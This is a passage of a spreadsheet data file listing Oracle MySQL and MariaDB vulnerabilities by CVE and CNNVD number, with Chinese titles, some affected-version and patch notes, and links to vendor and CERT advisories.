https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201807-1369</t>
  </si>
  <si>
    <t>Oracle MySQL Server组件安全漏洞(CVE-2018-3143)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201810-948
https://usn.ubuntu.com/3799-1/
https://lists.debian.org/debian-lts-announce/2018/11/msg00007.html
https://access.redhat.com/errata/RHSA-2018:3655
https://www.debian.org/security/2018/dsa-4341
http://www.securitytracker.com/id/1041888
https://security.netapp.com/advisory/ntap-20181018-0002/
https://access.redhat.com/errata/RHSA-2019:1258
http://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html
https://security.gentoo.org/glsa/201908-24
https://www.suse.com/support/update/announcement/2019/suse-su-20192048-1.html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https://packetstormsecurity.com/files/154133/Gentoo-Linux-Security-Advisory-201908-24.html
https://www.auscert.org.au/bulletins/ESB-2019.0874.2/
https://www.auscert.org.au/bulletins/76786
https://www.auscert.org.au/bulletins/ESB-2019.1829/
https://www.auscert.org.au/bulletins/ESB-2019.2926/
https://www.auscert.org.au/bulletins/76662
https://www.auscert.org.au/bulletins/77326</t>
  </si>
  <si>
    <t>Oracle MySQL Server组件安全漏洞(CVE-2018-3133)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201810-958
https://lists.debian.org/debian-lts-announce/2018/11/msg00004.html
https://usn.ubuntu.com/3799-1/
https://usn.ubuntu.com/3799-2/
https://access.redhat.com/errata/RHSA-2018:3655
http://www.securitytracker.com/id/1041888
https://security.netapp.com/advisory/ntap-20181018-0002/
https://access.redhat.com/errata/RHSA-2019:1258
http://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html
https://access.redhat.com/errata/RHSA-2019:1258
https://www.auscert.org.au/bulletins/ESB-2019.1829/</t>
  </si>
  <si>
    <t>Oracle MySQL/MariaDB组件安全漏洞(CVE-2018-3282)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201810-814
https://www.debian.org/security/2018/dsa-4341
https://security.netapp.com/advisory/ntap-20181018-0002/
https://access.redhat.com/errata/RHSA-2019:1258
https://access.redhat.com/errata/RHSA-2019:2327
https://lists.debian.org/debian-lts-announce/2018/11/msg00004.html
https://usn.ubuntu.com/3799-1/
https://usn.ubuntu.com/3799-2/
https://lists.debian.org/debian-lts-announce/2018/11/msg00007.html
https://access.redhat.com/errata/RHSA-2018:3655
http://www.securitytracker.com/id/1041888
http://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html
https://security.gentoo.org/glsa/201908-24
https://www.suse.com/support/update/announcement/2019/suse-su-20192048-1.html
https://access.redhat.com/errata/RHSA-2019:1258
https://www.suse.com/support/update/announcement/2019/suse-su-20191441-1.html
https://www.suse.com/support/update/announcement/2019/suse-su-20190628-1.html
https://access.redhat.com/errata/RHSA-2019:2327
https://www.suse.com/support/update/announcement/2019/suse-su-20190555-1.html
https://www.suse.com/support/update/announcement/2019/suse-su-20190555-1/
https://www.auscert.org.au/bulletins/ESB-2019.2967/
https://www.auscert.org.au/bulletins/ESB-2019.0874.2/
https://packetstormsecurity.com/files/153920/Red-Hat-Security-Advisory-2019-2327-01.html
https://www.auscert.org.au/bulletins/76786
https://www.auscert.org.au/bulletins/ESB-2019.1829/
https://www.auscert.org.au/bulletins/ESB-2019.2926/
https://www.auscert.org.au/bulletins/76662
https://www.auscert.org.au/bulletins/77326</t>
  </si>
  <si>
    <t>Oracle MySQL Server组件安全漏洞(CVE-2018-3156)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201810-935
https://usn.ubuntu.com/3799-1/
https://lists.debian.org/debian-lts-announce/2018/11/msg00007.html
https://access.redhat.com/errata/RHSA-2018:3655
https://www.debian.org/security/2018/dsa-4341
http://www.securitytracker.com/id/1041888
https://security.netapp.com/advisory/ntap-20181018-0002/
https://access.redhat.com/errata/RHSA-2019:1258
http://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html
https://security.gentoo.org/glsa/201908-24
https://www.suse.com/support/update/announcement/2019/suse-su-20192048-1.html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https://packetstormsecurity.com/files/154133/Gentoo-Linux-Security-Advisory-201908-24.html
https://www.auscert.org.au/bulletins/ESB-2019.0874.2/
https://www.auscert.org.au/bulletins/76786
https://www.auscert.org.au/bulletins/ESB-2019.1829/
https://www.auscert.org.au/bulletins/ESB-2019.2926/
https://www.auscert.org.au/bulletins/76662
https://www.auscert.org.au/bulletins/77326</t>
  </si>
  <si>
    <t>MySQL Server 安全漏洞(CVE-2020-14789)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-202010-950</t>
  </si>
  <si>
    <t>Oracle MySQL Server InnoDB 安全漏洞(CVE-2020-14776)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-202010-956</t>
  </si>
  <si>
    <t>Oracle MySQL Server/MariaDB 远程安全漏洞(CVE-2017-3641)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201707-1367
http://www.securitytracker.com/id/1038928</t>
  </si>
  <si>
    <t>Oracle MySQL Server远程安全漏洞(CVE-2017-3650)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201707-1272
http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html
http://www.securitytracker.com/id/1038928
https://access.redhat.com/errata/RHSA-2017:2886</t>
  </si>
  <si>
    <t>Oracle MySQL Server远程安全漏洞(CVE-2017-3642)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201707-1356
http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html
http://www.securitytracker.com/id/1038928
https://access.redhat.com/errata/RHSA-2017:2886</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201710-845
https://security.netapp.com/advisory/ntap-20171019-0002/
http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html
http://www.securitytracker.com/id/1039597
https://access.redhat.com/errata/RHSA-2017:3442</t>
  </si>
  <si>
    <t>Oracle MySQL Server远程安全漏洞(CVE-2017-10155)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201710-852
http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html</t>
  </si>
  <si>
    <t>Oracle MySQL Server/MariaDB 远程安全漏洞(CVE-2017-10384)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201710-733
http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html</t>
  </si>
  <si>
    <t>Oracle MySQL Server远程安全漏洞(CVE-2017-10276)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201710-826
http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html</t>
  </si>
  <si>
    <t>Oracle MySQL Server远程安全漏洞(CVE-2017-10167)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201710-843
https://security.netapp.com/advisory/ntap-20171019-0002/
http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html
http://www.securitytracker.com/id/1039597
https://access.redhat.com/errata/RHSA-2017:3442</t>
  </si>
  <si>
    <t>Oracle MySQL Server远程安全漏洞(CVE-2017-10227)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201710-838
https://security.netapp.com/advisory/ntap-20171019-0002/
http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html
http://www.securitytracker.com/id/1039597
https://access.redhat.com/errata/RHSA-2017:3442
https://access.redhat.com/errata/RHSA-2017:3265</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201710-820
http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html</t>
  </si>
  <si>
    <t>Oracle MySQL Server/MariaDB 远程安全漏洞(CVE-2017-10268)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201710-831
https://lists.debian.org/debian-lts-announce/2018/06/msg00015.html
https://www.debian.org/security/2018/dsa-4341
https://security.netapp.com/advisory/ntap-20171019-0002/
https://access.redhat.com/errata/RHSA-2019:1258
http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html
https://access.redhat.com/errata/RHSA-2018:2439
https://access.redhat.com/errata/RHSA-2018:0279
https://access.redhat.com/errata/RHSA-2018:0574
http://www.debian.org/security/2017/dsa-4002
http://www.securitytracker.com/id/1039597
https://access.redhat.com/errata/RHSA-2017:3442
https://access.redhat.com/errata/RHSA-2018:2729
https://access.redhat.com/errata/RHSA-2017:3265
https://access.redhat.com/errata/RHSA-2019:1258
https://www.auscert.org.au/bulletins/ESB-2019.1829/
https://packetstormsecurity.com/files/152981/Red-Hat-Security-Advisory-2019-1258-01.html</t>
  </si>
  <si>
    <t>Oracle MySQL Server安全漏洞（CVE-2019-2532）</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201901-694
https://security.netapp.com/advisory/ntap-20190118-0002/
https://access.redhat.com/errata/RHSA-2019:2484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</si>
  <si>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Server远程安全漏洞(CVE-2018-2755)</t>
  </si>
  <si>
    <t>https://lists.debian.org/debian-lts-announce/2018/06/msg00015.html
https://security.netapp.com/advisory/ntap-20180419-0002/
https://usn.ubuntu.com/3629-3/
https://www.debian.org/security/2018/dsa-4176
https://www.debian.org/security/2018/dsa-4341
https://access.redhat.com/errata/RHSA-2018:1254
https://access.redhat.com/errata/RHSA-2019:1258
https://usn.ubuntu.com/3629-1/
https://usn.ubuntu.com/3629-2/
https://access.redhat.com/errata/RHSA-2018:2439
http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html
https://access.redhat.com/errata/RHSA-2018:3655
https://access.redhat.com/errata/RHSA-2018:2729
https://security.gentoo.org/glsa/201908-24
https://lists.debian.org/debian-lts-announce/2018/04/msg00020.html
https://packetstormsecurity.com/files/154133/Gentoo-Linux-Security-Advisory-201908-24.html
https://www.auscert.org.au/bulletins/ESB-2019.1829/
https://packetstormsecurity.com/files/152981/Red-Hat-Security-Advisory-2019-1258-01.html</t>
  </si>
  <si>
    <t>Oracle MySQL Server远程安全漏洞(CVE-2018-2771)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201804-1250
https://lists.debian.org/debian-lts-announce/2018/06/msg00015.html
https://security.netapp.com/advisory/ntap-20180419-0002/
https://usn.ubuntu.com/3629-3/
https://www.debian.org/security/2018/dsa-4176
https://www.debian.org/security/2018/dsa-4341
https://access.redhat.com/errata/RHSA-2018:1254
https://access.redhat.com/errata/RHSA-2019:1258
https://usn.ubuntu.com/3629-1/
https://usn.ubuntu.com/3629-2/
https://access.redhat.com/errata/RHSA-2018:2439
http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html
http://www.securitytracker.com/id/1040698
https://access.redhat.com/errata/RHSA-2018:3655
https://access.redhat.com/errata/RHSA-2018:2729
https://lists.debian.org/debian-lts-announce/2018/04/msg00020.html
https://access.redhat.com/errata/RHSA-2019:1258
https://packetstormsecurity.com/files/154133/Gentoo-Linux-Security-Advisory-201908-24.html
https://www.auscert.org.au/bulletins/ESB-2019.1829/
https://packetstormsecurity.com/files/152981/Red-Hat-Security-Advisory-2019-1258-01.html</t>
  </si>
  <si>
    <t>Oracle MySQL Server远程安全漏洞(CVE-2018-2759)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201804-1261
https://security.netapp.com/advisory/ntap-20180419-0002/
https://usn.ubuntu.com/3629-3/
http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html
http://www.securitytracker.com/id/1040698
https://access.redhat.com/errata/RHSA-2018:3655
https://access.redhat.com/errata/RHSA-2019:1258
https://usn.ubuntu.com/3629-1/
https://access.redhat.com/errata/RHSA-2019:1258
https://packetstormsecurity.com/files/154133/Gentoo-Linux-Security-Advisory-201908-24.html
https://www.auscert.org.au/bulletins/ESB-2019.1829/
https://packetstormsecurity.com/files/152981/Red-Hat-Security-Advisory-2019-1258-01.html</t>
  </si>
  <si>
    <t>Oracle MySQL Server组件安全漏洞(CVE-2018-3251)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201810-844
https://usn.ubuntu.com/3799-1/</t>
  </si>
  <si>
    <t>Oracle MySQL Server组件安全漏洞(CVE-2018-3276)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201810-820
https://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html
https://dev.mysql.com/doc/relnotes/mysql/5.7/en/news-5-7-24.html
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201810-935
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201810-936
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201810-920
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201810-918
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201810-917
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201810-818</t>
  </si>
  <si>
    <t>Oracle MySQL Server组件安全漏洞(CVE-2018-3144)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201810-947
https://dev.mysql.com/doc/relnotes/mysql/8.0/en/news-8-0-13.html
https://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html</t>
  </si>
  <si>
    <t>Oracle MySQL Server组件安全漏洞(CVE-2018-3185)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201810-906
https://usn.ubuntu.com/3799-1/
https://access.redhat.com/errata/RHSA-2018:3655
http://www.securitytracker.com/id/1041888
https://security.netapp.com/advisory/ntap-20181018-0002/
https://access.redhat.com/errata/RHSA-2019:1258
http://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html
https://security.gentoo.org/glsa/201908-24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https://packetstormsecurity.com/files/154133/Gentoo-Linux-Security-Advisory-201908-24.html
https://www.auscert.org.au/bulletins/ESB-2019.0874.2/
https://www.auscert.org.au/bulletins/76786
https://www.auscert.org.au/bulletins/ESB-2019.1829/
https://www.auscert.org.au/bulletins/76662
https://www.auscert.org.au/bulletins/77326</t>
  </si>
  <si>
    <t>Oracle MySQL Server组件安全漏洞(CVE-2018-3162)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201810-929
https://usn.ubuntu.com/3799-1/
https://access.redhat.com/errata/RHSA-2018:3655
http://www.securitytracker.com/id/1041888
https://security.netapp.com/advisory/ntap-20181018-0002/
https://access.redhat.com/errata/RHSA-2019:1258
http://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html
https://security.gentoo.org/glsa/201908-24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https://packetstormsecurity.com/files/154133/Gentoo-Linux-Security-Advisory-201908-24.html
https://www.auscert.org.au/bulletins/ESB-2019.0874.2/
https://www.auscert.org.au/bulletins/76786
https://www.auscert.org.au/bulletins/ESB-2019.1829/
https://www.auscert.org.au/bulletins/76662
https://www.auscert.org.au/bulletins/77326</t>
  </si>
  <si>
    <t>Oracle MySQL Server组件安全漏洞(CVE-2018-3173)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201810-918</t>
  </si>
  <si>
    <t>Oracle MySQL Server组件安全漏洞(CVE-2018-3200)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201810-892
https://usn.ubuntu.com/3799-1/</t>
  </si>
  <si>
    <t>Oracle MySQL Server安全漏洞（CVE-2019-2529）</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201901-691
https://security.netapp.com/advisory/ntap-20190118-0002/
https://lists.debian.org/debian-lts-announce/2019/02/msg00000.html
https://access.redhat.com/errata/RHSA-2019:2484
http://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html
https://usn.ubuntu.com/3867-1/
https://access.redhat.com/errata/RHSA-2019:2327
https://www.suse.com/support/update/announcement/2019/suse-su-20192048-1.html
https://access.redhat.com/errata/RHSA-2019:2327
https://www.suse.com/support/update/announcement/2019/suse-su-20192118-1.html
https://www.auscert.org.au/bulletins/ESB-2019.2967/
https://www.auscert.org.au/bulletins/80370
https://packetstormsecurity.com/files/153920/Red-Hat-Security-Advisory-2019-2327-01.html
https://www.auscert.org.au/bulletins/ESB-2019.2926/
https://www-01.ibm.com/support/docview.wss?uid=ibm10883622
https://www.auscert.org.au/bulletins/ESB-2019.3113/</t>
  </si>
  <si>
    <t>Oracle MySQL Server安全漏洞（CVE-2019-2537）</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201901-699
https://security.netapp.com/advisory/ntap-20190118-0002/
https://lists.debian.org/debian-lts-announce/2019/02/msg00000.html
http://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html
https://usn.ubuntu.com/3867-1/
https://access.redhat.com/errata/RHSA-2019:1258
https://www.suse.com/support/update/announcement/2019/suse-su-20192048-1.html
https://access.redhat.com/errata/RHSA-2019:1258
https://www.suse.com/support/update/announcement/2019/suse-su-20190609-1.html
https://www.suse.com/support/update/announcement/2019/suse-su-20190555-1.html
https://www.suse.com/support/update/announcement/2019/suse-su-20190555-1/
https://www.suse.com/support/update/announcement/2019/suse-su-20192118-1.html
https://www.auscert.org.au/bulletins/80370
https://www.auscert.org.au/bulletins/76786
https://www.auscert.org.au/bulletins/77178
https://www.auscert.org.au/bulletins/ESB-2019.1829/
https://www.auscert.org.au/bulletins/ESB-2019.2926/
https://www.auscert.org.au/bulletins/76662
https://www-01.ibm.com/support/docview.wss?uid=ibm10883622
https://www.auscert.org.au/bulletins/ESB-2019.3113/</t>
  </si>
  <si>
    <t>Oracle MySQL Server安全漏洞（CVE-2019-2481）</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201901-652
https://security.netapp.com/advisory/ntap-20190118-0002/
https://access.redhat.com/errata/RHSA-2019:2484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</si>
  <si>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Server安全漏洞（CVE-2019-2507）</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201901-675
https://security.netapp.com/advisory/ntap-20190118-0002/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</si>
  <si>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Server组件安全漏洞(CVE-2018-2583)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201801-605
http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html</t>
  </si>
  <si>
    <t>Oracle MySQL Server组件安全漏洞(CVE-2018-2647)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201801-602
https://usn.ubuntu.com/3537-1/</t>
  </si>
  <si>
    <t>Oracle MySQL Server远程安全漏洞(CVE-2017-3331)</t>
  </si>
  <si>
    <t>影响MySQL:5.7.11版本(含)到5.7.17版本(含)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201704-1329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</si>
  <si>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Server远程安全漏洞(CVE-2017-3450)</t>
  </si>
  <si>
    <t>影响MySQL:5.6.0版本(含)到5.6.35版本(含),5.7.0版本(含)到5.7.17版本(含)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201704-1325
https://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html
https://dev.mysql.com/doc/relnotes/mysql/5.6/en/news-5-6-36.html
https://www.oracle.com/ocom/groups/public/@otn/documents/webcontent/3681811.xml
https://www.oracle.com/ocom/groups/public/@otn/documents/webcontent/3809960.xml
https://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html#AppendixMSQL
http://riddle.link/
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201704-1313
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201704-1312
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201704-1314
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201704-1311
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201702-216
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201704-1319
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201702-215
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201704-1331
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201704-1332
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201704-1330
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201704-1198
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201611-319
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201702-410
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201704-1199
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201704-1322
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201704-1323
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201703-1072</t>
  </si>
  <si>
    <t>Oracle MySQL Server远程安全漏洞(CVE-2017-3308)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201704-1332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</si>
  <si>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Server远程安全漏洞(CVE-2017-3329)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201704-1330
https://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html#AppendixMSQL
http://riddle.link/
https://www.oracle.com/ocom/groups/public/@otn/documents/webcontent/3681811.xml
https://dev.mysql.com/doc/relnotes/mysql/5.5/en/news-5-5-55.html</t>
  </si>
  <si>
    <t>Oracle MySQL Server远程安全漏洞(CVE-2017-3457)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201704-1318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</si>
  <si>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Server远程安全漏洞(CVE-2017-3460)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201704-1315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</si>
  <si>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Server远程安全漏洞(CVE-2018-2762)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201804-1258
http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html</t>
  </si>
  <si>
    <t>Oracle MySQL Server远程安全漏洞(CVE-2018-2769)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201804-1252
http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html</t>
  </si>
  <si>
    <t>Oracle MySQL Server组件访问控制错误漏洞(CVE-2019-2739)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201907-911
http://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html
https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html
http://www.oracle.com/index.html
https://seclists.org/bugtraq/2019/Aug/1
https://usn.ubuntu.com/4070-1/
https://packetstormsecurity.com/files/153862/Slackware-Security-Advisory-mariadb-Updates.html
https://www.suse.com/support/update/announcement/2019/suse-su-20193311-1.html
https://usn.ubuntu.com/4070-2/
https://www.suse.com/support/update/announcement/2019/suse-su-20193369-1.html
https://vigilance.fr/vulnerability/Oracle-MySQL-vulnerabilities-of-July-2019-29795
https://www.auscert.org.au/bulletins/ESB-2020.0902/
https://nvd.nist.gov/vuln/detail/CVE-2019-2739
https://www.auscert.org.au/bulletins/ESB-2019.3082/
https://www.ibm.com/blogs/psirt/security-bulletin-api-connect-is-impacted-by-multiple-vulnerabilities-in-oracle-mysql-2/
https://packetstormsecurity.com/files/153862/Slackware-Security-Advisory-mariadb-Updates.html
https://packetstormsecurity.com/files/154037/Ubuntu-Security-Notice-USN-4070-3.html
https://www.auscert.org.au/bulletins/ESB-2019.2784/
https://www.auscert.org.au/bulletins/ESB-2019.4683/
https://www.auscert.org.au/bulletins/ESB-2019.4773/</t>
  </si>
  <si>
    <t>Oracle MySQL Server组件访问控制错误漏洞(CVE-2019-2737)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201907-916
http://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html
https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html
http://www.oracle.com/index.html
https://seclists.org/bugtraq/2019/Aug/1
https://usn.ubuntu.com/4070-1/
https://packetstormsecurity.com/files/153862/Slackware-Security-Advisory-mariadb-Updates.html
https://www.suse.com/support/update/announcement/2019/suse-su-20193311-1.html
https://access.redhat.com/errata/RHSA-2019:2511
https://www.suse.com/support/update/announcement/2019/suse-su-20193369-1.html
https://vigilance.fr/vulnerability/Oracle-MySQL-vulnerabilities-of-July-2019-29795
https://www.auscert.org.au/bulletins/ESB-2019.3142/
https://nvd.nist.gov/vuln/detail/CVE-2019-2737
https://www.auscert.org.au/bulletins/ESB-2020.0902/
https://www.ibm.com/blogs/psirt/security-bulletin-api-connect-is-impacted-by-multiple-vulnerabilities-in-oracle-mysql-2/
https://packetstormsecurity.com/files/153742/Ubuntu-Security-Notice-USN-4070-1.html
https://packetstormsecurity.com/files/153862/Slackware-Security-Advisory-mariadb-Updates.html
https://www.auscert.org.au/bulletins/ESB-2019.2784/
https://www.auscert.org.au/bulletins/ESB-2019.4683/
https://www.auscert.org.au/bulletins/ESB-2019.4773/</t>
  </si>
  <si>
    <t>Oracle MySQL Server组件访问控制错误漏洞(CVE-2019-2738)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201907-915
http://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html
https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html
http://www.oracle.com/index.html
https://access.redhat.com/errata/RHSA-2019:2484
https://usn.ubuntu.com/4070-1/
https://support.f5.com/csp/article/K51272092
https://access.redhat.com/errata/RHSA-2019:2511
https://access.redhat.com/errata/RHSA-2019:2511
https://vigilance.fr/vulnerability/Oracle-MySQL-vulnerabilities-of-July-2019-29795
https://www.auscert.org.au/bulletins/ESB-2019.3142/
https://nvd.nist.gov/vuln/detail/CVE-2019-2738
https://www.auscert.org.au/bulletins/ESB-2019.3849/
https://www.ibm.com/blogs/psirt/security-bulletin-api-connect-is-impacted-by-multiple-vulnerabilities-in-oracle-mysql-2/
https://www.ibm.com/support/pages/node/1078971
https://www.auscert.org.au/bulletins/ESB-2019.2784/</t>
  </si>
  <si>
    <t>Oracle MySQL Server 安全漏洞（CVE-2019-5443）</t>
  </si>
  <si>
    <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://www.oracle.com/security-alerts/cpuoct2019.html</t>
  </si>
  <si>
    <t>https://www.oracle.com/security-alerts/cpuoct2019.html</t>
  </si>
  <si>
    <t>Oracle MySQL Server 信息泄露漏洞(CVE-2019-2922)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201910-1002
http://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html
https://usn.ubuntu.com/4195-1/
https://security.netapp.com/advisory/ntap-20191017-0002/
https://usn.ubuntu.com/4195-1/
https://www.oracle.com/technetwork/security-advisory/cpuoct2019verbose-5072833.html
https://nvd.nist.gov/vuln/detail/CVE-2019-2922
https://www.auscert.org.au/bulletins/ESB-2019.4373/
https://packetstormsecurity.com/files/155381/Ubuntu-Security-Notice-USN-4195-1.html
https://www.ibm.com/blogs/psirt/security-bulletin-api-connect-is-impacted-by-multiple-vulnerabilities-in-oracle-mysql/
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-guardium-is-affected-by-oracle-mysql-vulnerabilities/</t>
  </si>
  <si>
    <t>Oracle MySQL Server 信息泄露漏洞(CVE-2019-2923)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201910-1004
http://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html
https://usn.ubuntu.com/4195-1/
https://security.netapp.com/advisory/ntap-20191017-0002/
https://usn.ubuntu.com/4195-1/
https://www.oracle.com/technetwork/security-advisory/cpuoct2019verbose-5072833.html
https://nvd.nist.gov/vuln/detail/CVE-2019-2923
https://www.auscert.org.au/bulletins/ESB-2019.4373/
https://www.ibm.com/blogs/psirt/security-bulletin-api-connect-is-impacted-by-multiple-vulnerabilities-in-oracle-mysql/
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-guardium-is-affected-by-oracle-mysql-vulnerabilities/</t>
  </si>
  <si>
    <t>Oracle MySQL Server/MariaDB 输入验证错误漏洞(CVE-2019-2938)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201910-1000
http://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html
https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7X5D3O4TOQ57KL5FLQEXH2JB2UQYHCUZ/
https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6DTUCXX5XXPNPFV2PHP6IESGTCFMZOFP/
